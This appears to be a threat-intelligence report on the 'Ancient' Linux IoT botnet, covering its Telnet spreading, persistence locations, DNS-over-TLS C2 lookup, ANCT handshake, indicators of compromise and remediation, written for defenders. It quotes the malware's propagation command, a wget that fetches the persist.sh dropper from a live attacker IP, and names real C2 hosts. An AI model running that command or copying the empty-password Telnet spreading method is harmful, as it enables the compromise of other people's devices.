Threat reportMalwareTL-2026-2955
"Ancient" Linux IoT botnet with custom ANCT C2 protocol (Telnet-spreading, DNS-over-TLS C2 resolution)
"Ancient" Linux IoT botnet with custom ANCT C2 protocol (TL-2026-2955), also tracked as Ancient, is a medium-severity malware campaign, first published 2026-10-05. It has no confirmed attribution, affects Various Linux-based IoT/embedded devices exposing Telnet (ARM, maps to 15 MITRE ATT&CK techniques (T1021, T1037.004, T1049), and is covered by 9 detection rules and 24 indicators of compromise.
- Severity
- MEDIUMAssessed severity
- CVEs
- 0None referenced
- Techniques
- 15MITRE ATT&CK
- Actors
- 0Not attributed
- Detection rules
- 9SPL · KQL · Sigma
- IOCs
- 24Indicators of compromise
Key facts for TL-2026-2955
- Threat ID
- TL-2026-2955
- Also known as
- Ancient, elf.ancient
- Severity
- MEDIUM
- Status
- ACTIVE
- Category
- MALWARE
- First published
- Last reviewed
- Attribution confidence
- LOW
- Motivation
- UNKNOWN
- Target sectors
- technology, telecoms, consumer-iot
- Target regions
- Global
- Detection rules
- 9
- Indicators of compromise
- 24
Malware and tooling in "Ancient" Linux IoT botnet with custom ANCT C2 protocol
Malware and tooling: Ancient, Mirai
How "Ancient" Linux IoT botnet with custom ANCT C2 protocol works
Ancient is a previously undocumented Linux IoT botnet (Malpedia elf.ancient) that spreads via Telnet from already-infected devices, persists through cron, rc.local, init.d and profile.d, resolves its C2 over DNS-over-TLS, and communicates over a custom ANCT protocol. First samples were observed on 2026-10-04.
Ancient is a Linux IoT botnet documented by Christophe Hubert (ksi-digital) on 2026-10-05 and catalogued by Malpedia as elf.ancient. The dropper, a shell script named persist.sh, ships 13 builds covering arm4-arm8, mips, mpsl, x86, x86_64, m68k, ppc and sh4.
Propagation is by Telnet: an already-infected device logs in to a target (the write-up reports empty-password root access, with probe routines testing for a working shell and busybox) and runs a command of the form 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://89.163.157.131:8080/persist.sh'. The target reports a status string back: ANCIENT_STARTED, ANCIENT_NOCONN, ANCIENT_SKIP or ANCIENT_FAIL.
The dropper installs persistence in several places: a cron entry running every 5 minutes (including /etc/crontab and /var/spool/cron/root), rc.local, /etc/init.d/.ancient and, from dropper v3, /etc/profile.d/.ancient.sh. The bot binary uses the hidden filename .ancient. Three dropper versions (2802 B, 3380 B, 5952 B) and two x86-64 bot builds (2026-10-04 15:37 and 19:09 UTC) were observed.
The bot stays dormant while being ptraced, so no network activity occurs under a debugger. It resolves its C2 domain zyrec2.duckdns.org over DNS-over-TLS to Cloudflare 1.1.1.1:853, which hides the lookup from port-53 monitoring. The C2 handshake on TCP/35342 is a custom ANCT protocol: the bot sends the 4-byte magic 'ANCT' (41 4E 43 54) plus 32 high-entropy bytes (ephemeral key exchange), the server replies with 36 high-entropy bytes, and the stream is encrypted thereafter. The compiled bot generates its C2 domain, port and ANCT tag at runtime, so static string signatures only apply to the dropper script; the ANCT magic is port-agnostic on the wire.
The payload server and C2 share one host (89.163.157.131, AS24961 myLoc/WIIT AG, Germany; payload on 8080, C2 on 35342). Telnet loader sources 94.154.43.138 (delivered Ancient) and 94.154.43.196 (delivered a Mirai kit) sit in AS219502. The source notes a shared loader routine with an unrelated Mirai variant from the same network range. No CVE is exploited, no actor is attributed and no impact beyond botnet recruitment is documented; severity is analyst-assigned.
MITRE ATT&CK techniques used in TL-2026-2955
Lateral Movement
Persistence
T1037.004 RC Scripts; T1053.003 Cron; T1546.004 Unix Shell Configuration Modification
Discovery
T1049 System Network Connections Discovery; T1082 System Information Discovery
Execution
Command and Control
T1071.004 DNS; T1095 Non-Application Layer Protocol; T1568 Dynamic Resolution; T1571 Non-Standard Port; T1573 Encrypted Channel
Initial Access
Defense Evasion
T1564.001 Hidden Files and Directories; T1622 Debugger Evasion
Affected products and versions in "Ancient" Linux IoT botnet with custom ANCT C2 protocol
- Various — Linux-based IoT/embedded devices exposing Telnet (ARM arm4-arm8, MIPS, x86, x86_64, m68k, PowerPC, sh4)
Vulnerable versions: Devices with Telnet enabled and empty or weak root credentials
Remediation for "Ancient" Linux IoT botnet with custom ANCT C2 protocol
Immediate actions
- Block egress and ingress to 89.163.157.131 (ports 8080 and 35342) and the Telnet loader sources 94.154.43.138, 94.154.43.196 and 77.239.124.121
- Sinkhole or block zyrec2.duckdns.org and alert on outbound DNS-over-TLS (TCP/853) from IoT/embedded segments
- Alert on TCP payloads whose first four bytes are 'ANCT' (41 4E 43 54), regardless of port
- Hunt for /etc/init.d/.ancient, /etc/profile.d/.ancient.sh, .ancient binaries and persist.sh in /tmp, /var/run, /mnt and /root
Workarounds
- Block TCP/23 inbound from the internet and between internal segments
- Remove the cron, rc.local, init.d and profile.d entries that reference .ancient, then reboot and re-image if the device cannot be verified clean
Longer-term hardening
- Disable Telnet on IoT/embedded devices; use SSH with key-based auth
- Eliminate empty and default credentials on all devices
- Segment IoT devices and restrict their egress to required destinations only
Weaknesses (CWE) in "Ancient" Linux IoT botnet with custom ANCT C2 protocol
Timeline of "Ancient" Linux IoT botnet with custom ANCT C2 protocol
- AS219502 (STORMCLOUD-AS, Storm Industries LLC), hosting the Ancient and Mirai Telnet loaders (94.154.43.0/24, 176.65.139.0/24), announced; zyrec2.duckdns.org has been listed in ThreatFox as a Mirai C2 since 2026-06
- Mirai C2 176.65.139.196:18129, from the same network range as the Ancient loader but an unrelated variant, listed
- persist.sh v3 (5952 B) served at 19:09 UTC with filesystem-durability scoring, a port byte-order fix and profile.d persistence; x86-64 bot rebuilt (SHA-256 748f50d4...)
- persist.sh v2 (3380 B) served in the afternoon, adding a duplicate-instance guard
- Infected device 94.154.43.138 Telnet-infected a honeypot at 15:37 UTC; dropper persist.sh v1 (2802 B) and the first x86-64 bot (SHA-256 6c44cbf5...) were fetched from 89.163.157.131:8080
- Probe-only Telnet source 77.239.124.121 (AS198364) hit the honeypot at 00:31 UTC using the same loader probe routine
- Christophe Hubert (ksi-digital) published the Ancient botnet write-up with IOCs and YARA, Suricata and Sigma detections
- Loader 94.154.43.196 delivered an unrelated Mirai kit at 12:58 UTC using the same Telnet routine as Ancient
- C2 at 89.163.157.131:35342 confirmed live in a controlled 10-minute window (02:01-02:11 UTC); ANCT handshake documented and the bot uploaded about 1.79 MB with no tasking from the server
- C2 89.163.157.131:35342 reported to ThreatFox and the IP to Spamhaus (~01:50 UTC); myLoc abuse contact notified
- Sandbox runs showed no network activity while ptrace-traced (01:09 UTC); untraced (01:36 UTC) the bot resolved the C2 over DoT and made 33 connection attempts, blocked
- Malpedia entry elf.ancient added (library entry dated 2026-10-05; the write-up records the entry as added 2026-10-06)
Sources cited for "Ancient" Linux IoT botnet with custom ANCT C2 protocol
- "Ancient": a Linux IoT botnet with a custom ANCT C2 protocol (Christophe Hubert, ksi-digital)
- Malpedia library entry (elf.ancient)
- ksi-digital ancient-botnet IOC list (iocs.csv)
- ksi-digital ancient-botnet detection rules (YARA, Suricata, Sigma)
- ksi-digital ancient-botnet README (technical write-up)
- ThreatFox IOC database (C2 89.163.157.131:35342 reported 2026-10-05)
- URLhaus payload URLs 3928556, 3928557, 3927883
Detection coverage for TL-2026-2955
As of 2026-10-05, Threadlinqs Intelligence publishes 9 detection rule(s) for TL-2026-2955 across Splunk SPL, Microsoft KQL and Sigma, covering 24 indicator(s) of compromise. The whole corpus is readable without an account; a free account unlocks full detection query text in Splunk SPL, Microsoft KQL and Sigma; paid tiers add raw indicator values, correlation and the MCP server. Threadlinqs MCP server · View plans.